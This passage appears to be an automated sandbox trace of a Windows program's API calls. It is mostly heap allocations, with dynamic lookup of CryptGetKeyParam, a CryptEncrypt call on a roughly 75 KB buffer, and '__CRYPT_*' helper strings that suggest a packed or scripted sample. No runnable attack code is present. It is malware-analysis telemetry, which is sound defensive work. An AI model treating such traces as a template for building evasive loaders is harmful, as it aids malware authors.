[0075.246] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5d8 | out: hHeap=0x650000) returned 1 [0075.246] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0075.246] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0075.246] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0075.246] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0075.246] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0075.246] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0075.246] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0075.246] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4b8 | out: hHeap=0x650000) returned 1 [0075.246] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0075.247] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0075.247] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0075.247] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0075.247] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0075.247] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0075.247] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0075.247] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.247] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0075.247] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0075.247] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0075.247] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5c8 | out: hHeap=0x650000) returned 1 [0075.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0075.247] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x11) returned 0x6f96e8 [0075.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x6f96e8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0075.247] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0075.247] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de78 [0075.247] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0075.247] GetProcAddress (hModule=0x77710000, lpProcName="CryptGetKeyParam") returned 0x777377cb [0075.247] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de78 | out: hHeap=0x650000) returned 1 [0075.247] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5c8 | out: hHeap=0x650000) returned 1 [0075.247] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de78 [0075.247] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5c8 [0075.247] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb388 [0075.247] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb458 [0075.247] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4d8 [0075.247] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0075.247] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5c8 | out: hHeap=0x650000) returned 1 [0075.247] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0075.247] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x650000) returned 1 [0075.248] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4d8 | out: hHeap=0x650000) returned 1 [0075.248] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0075.248] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de78 | out: hHeap=0x650000) returned 1 [0075.248] CryptGetKeyParam (in: hKey=0x6b8b78, dwParam=0x7, pbData=0x6bb508, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb508*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0075.248] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0075.248] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792010 [0075.248] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96e8 [0075.248] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0075.248] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1c8 [0075.248] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e318 [0075.248] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4d8 [0075.248] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0075.248] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4d8 | out: hHeap=0x650000) returned 1 [0075.248] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0075.248] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1c8 [0075.248] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e318 [0075.248] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e018 [0075.248] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4d8 [0075.248] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e018 | out: hHeap=0x650000) returned 1 [0075.248] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4d8 | out: hHeap=0x650000) returned 1 [0075.248] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0075.248] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e318 [0075.248] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e018 [0075.248] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e150 [0075.248] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4d8 [0075.248] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e150 | out: hHeap=0x650000) returned 1 [0075.248] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4d8 | out: hHeap=0x650000) returned 1 [0075.248] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e018 | out: hHeap=0x650000) returned 1 [0075.248] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e018 [0075.248] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e150 [0075.248] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0075.249] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4d8 [0075.249] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0075.249] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4d8 | out: hHeap=0x650000) returned 1 [0075.249] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e150 | out: hHeap=0x650000) returned 1 [0075.249] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e150 [0075.249] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0075.249] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e300 [0075.249] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4d8 [0075.249] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0075.249] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4d8 | out: hHeap=0x650000) returned 1 [0075.249] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0075.249] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0075.249] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e300 [0075.249] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aee0 [0075.249] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4d8 [0075.249] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aee0 | out: hHeap=0x650000) returned 1 [0075.249] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4d8 | out: hHeap=0x650000) returned 1 [0075.249] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0075.249] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5d8 | out: hHeap=0x650000) returned 1 [0075.249] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0075.249] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4b8 | out: hHeap=0x650000) returned 1 [0075.249] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0075.249] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.249] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dae0 | out: hHeap=0x650000) returned 1 [0075.249] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfe8 | out: hHeap=0x650000) returned 1 [0075.249] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.249] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0075.249] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0075.249] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e498 | out: hHeap=0x650000) returned 1 [0075.249] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3d8 | out: hHeap=0x650000) returned 1 [0075.249] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: hHeap=0x650000) returned 1 [0075.249] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5b8 | out: hHeap=0x650000) returned 1 [0075.249] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e090 | out: hHeap=0x650000) returned 1 [0075.249] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0075.250] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e648 | out: hHeap=0x650000) returned 1 [0075.250] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0075.250] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df40 | out: hHeap=0x650000) returned 1 [0075.250] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0075.250] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfd0 | out: hHeap=0x650000) returned 1 [0075.250] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acd0 | out: hHeap=0x650000) returned 1 [0075.250] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0075.250] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0075.250] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfa0 | out: hHeap=0x650000) returned 1 [0075.250] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5e8 | out: hHeap=0x650000) returned 1 [0075.250] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0075.250] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0075.250] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b780 | out: hHeap=0x650000) returned 1 [0075.250] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0075.250] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0075.250] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4a8 [0075.250] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x7dd398 [0075.250] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb418 [0075.250] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x7dd398 | out: hHeap=0x650000) returned 1 [0075.250] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.250] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0075.250] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3e8 [0075.250] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9728 [0075.250] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb518 [0075.250] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0075.250] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.250] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9728 | out: hHeap=0x650000) returned 1 [0075.250] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.250] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0075.250] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8c38 [0075.250] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0075.250] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4a8 [0075.250] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dae0 [0075.250] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0075.251] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0075.251] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f9728 [0075.251] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44) returned 0x76f0b0 [0075.251] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0075.251] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3e8 [0075.251] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5e8 [0075.251] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb518 [0075.251] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.251] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfa0 [0075.251] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0075.251] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.251] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5e8 | out: hHeap=0x650000) returned 1 [0075.251] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0075.251] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0075.251] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.251] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f0b0 | out: hHeap=0x650000) returned 1 [0075.251] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9728 | out: hHeap=0x650000) returned 1 [0075.251] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0075.251] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfa0 | out: hHeap=0x650000) returned 1 [0075.251] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dae0 | out: hHeap=0x650000) returned 1 [0075.251] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.251] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb608 [0075.251] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x7dd398 [0075.251] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb628 [0075.251] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.251] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb608 [0075.251] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb628 [0075.251] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0075.252] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.252] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.252] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.252] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d9f0 [0075.252] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e420 [0075.252] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb608 [0075.252] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.252] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5b8 [0075.252] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddb0 [0075.252] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0075.252] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.252] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0075.252] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb438 [0075.252] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.252] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.252] PeekMessageW (in: lpMsg=0x61e27c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e27c) returned 0 [0075.252] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb438 [0075.252] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb478 [0075.252] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.252] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.252] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5b8 [0075.252] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.252] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0075.252] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0075.252] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0075.252] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0075.252] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.252] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0075.252] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.252] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8bf8 [0075.252] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.252] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0075.252] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb438 [0075.253] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0075.253] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.253] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.253] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0075.253] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddb0 [0075.253] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e150 [0075.253] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb438 [0075.253] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb478 [0075.253] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.253] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.253] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0075.253] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb478 [0075.253] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb528 [0075.254] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.254] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aee0 [0075.254] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0075.254] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb478 [0075.254] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad18 [0075.254] CryptEncrypt (in: hKey=0x6b8b78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x1267f, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x12680) returned 1 [0075.254] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb638 [0075.254] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792010 [0075.254] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df40 [0075.254] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aee0 [0075.254] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad18 [0075.254] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e168 [0075.254] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5c8 [0075.254] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.254] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb638 [0075.254] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1090 [0075.254] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb438 [0075.254] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.255] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, 